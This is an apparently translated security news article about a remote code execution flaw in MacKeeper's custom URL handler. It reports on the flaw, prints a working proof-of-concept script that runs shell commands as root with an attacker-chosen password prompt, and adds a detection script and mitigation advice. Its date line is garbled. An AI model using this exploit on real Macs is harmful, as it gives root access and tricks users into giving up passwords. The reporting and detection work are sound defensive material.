Mac "MacKeeper" Exposes Arbitrary Code Execution Vulnerability

Source: Internet
Author: User
Tags: uninstall mackeeper


Most Mac users will have seen MacKeeper ads. MacKeeper is a Mac OS system optimization suite that bundles anti-virus, encryption, data backup, system cleaning and software uninstallation, and it is pitched as an all-in-one utility for the Mac.

On July 6, May 7, a serious security vulnerability was found in MacKeeper. It is a remote code execution vulnerability in MacKeeper's URL-handling code: simply visiting a maliciously crafted web page is enough to trigger it.

Vulnerability description

Security researcher Braden Thomas discovered the vulnerability. When a user visits a malicious website, the attacker can execute arbitrary code as root, the highest system privilege, without any user interaction. He also published a PoC (proof-of-concept program) showing that arbitrary code runs when the malicious page is opened in Safari; the code executed by the PoC simply uninstalls MacKeeper. The root cause is that MacKeeper performs no security check on the input it receives through its custom URL scheme before using it to execute commands.

If the user has already entered their password for MacKeeper during normal use, no password prompt appears when the attacker's code is executed with root privileges. If the user has not authenticated before, MacKeeper will prompt for the account password. However, the text of that prompt is itself supplied by the attacker as part of the exploit (the PROMPT field in the PoC), so the user may not notice that anything is wrong.

Apple allows OS X and iOS apps to register custom URL schemes. When such a URL is opened, the system launches the registered app and hands it the URL to process. Normally this lets a custom protocol trigger a specific action (for example, tapping a phone number link on iOS asks whether you want to place a call, and clicking an email address opens the mail app). Apple's developer documentation clearly tells developers that they must perform a security check on the incoming custom URL so that it cannot be processed in unexpected ways, and Apple's official documents also stress the importance of validating input data in general.

Impact Scope

Since this 0day also exists in the latest MacKeeper release (MacKeeper 3.4), a large number of users are affected; according to an earlier report, MacKeeper has tens of millions of users. MacKeeper is a controversial application in the Mac community, and users complain that it pushes advertisements through frequent pop-up windows.
Now that the PoC for this vulnerability has been published, MacKeeper users are easy targets.

PoC:
import base64
from Foundation import *
# Command run as root by the PoC: it simply removes MacKeeper itself.
RUN_CMD = "rm -rf /Applications/MacKeeper.app; pkill -9 -a MacKeeper"
# NSArchiver-serialize a class name plus a task description; MacKeeper's URL handler unarchives and runs it unchecked.
d = NSMutableData.data()
a = NSArchiver.alloc().initForWritingWithMutableData_(d)
a.encodeValueOfObjCType_at_("@", NSString.stringWithString_("NSTask"))
a.encodeValueOfObjCType_at_("@", NSDictionary.dictionaryWithObjectsAndKeys_(
    NSString.stringWithString_("/bin/sh"), "LAUNCH_PATH",
    NSArray.arrayWithObjects_(NSString.stringWithString_("-c"), NSString.stringWithString_(RUN_CMD), None), "ARGUMENTS",
    NSString.stringWithString_("Your computer has malware that needs to be removed."), "PROMPT",  # attacker-chosen prompt text
    None))
# The archive is base64-encoded into the custom URL that MacKeeper handles.
print("com-zeobit-command://I/ZBAppController/javasmactionwithhelpertask:arguments:/"
      + base64.b64encode(bytes(d)).decode("ascii"))
https://twitter.com/drspringfield/status/596316000385167361
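As an added defender-side example (not from the page, Braden Thomas or MacKeeper), the following Python checks whether a link targets the vulnerable com-zeobit-command handler and whether its payload looks like the NSArchiver-serialized NSTask description the PoC above builds, so such links can be flagged in proxy logs or page content. The path layout and the "streamtyped" archive header are assumptions, and the sample link and archive bytes are constructed for the demo.

```python
import base64
import binascii
from urllib.parse import urlsplit, unquote

# Values taken from the page: the URL scheme MacKeeper registers, and the
# strings the PoC's NSArchiver payload contains to describe an NSTask.
VULNERABLE_SCHEME = "com-zeobit-command"
ARCHIVE_MAGIC = b"streamtyped"  # assumed header of an NSArchiver (typedstream) blob
TASK_MARKERS = (b"NSTask", b"LAUNCH_PATH", b"ARGUMENTS", b"/bin/sh")


def inspect_link(url):
    """Classify one URL: 'clean', 'mackeeper' (scheme only) or 'exploit'."""
    parts = urlsplit(url.strip())
    if parts.scheme.lower() != VULNERABLE_SCHEME:
        return {"verdict": "clean", "markers": []}
    # Assumed path layout, as in the PoC: /<controller>/<selector>/<base64>.
    # base64 itself may contain '/', so split into at most four pieces.
    segments = parts.path.split("/", 3)
    if len(segments) < 4:
        return {"verdict": "mackeeper", "markers": []}
    try:
        blob = base64.b64decode(unquote(segments[3]), validate=True)
    except (binascii.Error, ValueError):
        return {"verdict": "mackeeper", "markers": []}
    found = [m.decode() for m in TASK_MARKERS if m in blob]
    archived = ARCHIVE_MAGIC in blob[:16]
    if archived and b"NSTask" in blob:
        return {"verdict": "exploit", "markers": found}
    return {"verdict": "mackeeper", "markers": found}


def scan_lines(lines):
    """Run inspect_link over e.g. proxy-log lines; return (token, verdict) hits."""
    hits = []
    for line in lines:
        for token in line.split():
            if token.lower().startswith(VULNERABLE_SCHEME + "://"):
                hits.append((token, inspect_link(token)["verdict"]))
    return hits


def constructed_sample():
    """Hand-built stand-in for the PoC output (NOT a real NSArchiver stream):
    the assumed typedstream header followed by the names the PoC archives."""
    fake = b"\x04\x0bstreamtyped\x81\xe8\x03\x84\x01@NSTask\x84/bin/sh\x84LAUNCH_PATH"
    fake += b"\x84-c\x84echo test\x84ARGUMENTS\x84Your computer has malware\x84PROMPT"
    return (VULNERABLE_SCHEME + "://I/ZBAppController/selector:arguments:/"
            + base64.b64encode(fake).decode("ascii"))
```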

Security suggestions

MacKeeper users should update to the latest version immediately. By default, MacKeeper checks for updates automatically; when it prompts you to upgrade, click OK to install the update.

You can also reduce your exposure in other ways. On OS X, clicking a custom-scheme link in Safari hands the URL straight to the application registered for that scheme, whereas other browsers, such as Chrome, first ask whether you agree to open the link with that application.
So, as a technical tip, use a browser other than Safari: the browser will then prompt you before the URL reaches MacKeeper and any code is executed. Alternatively, you can remove the custom URL scheme registration from MacKeeper's Info.plist file.

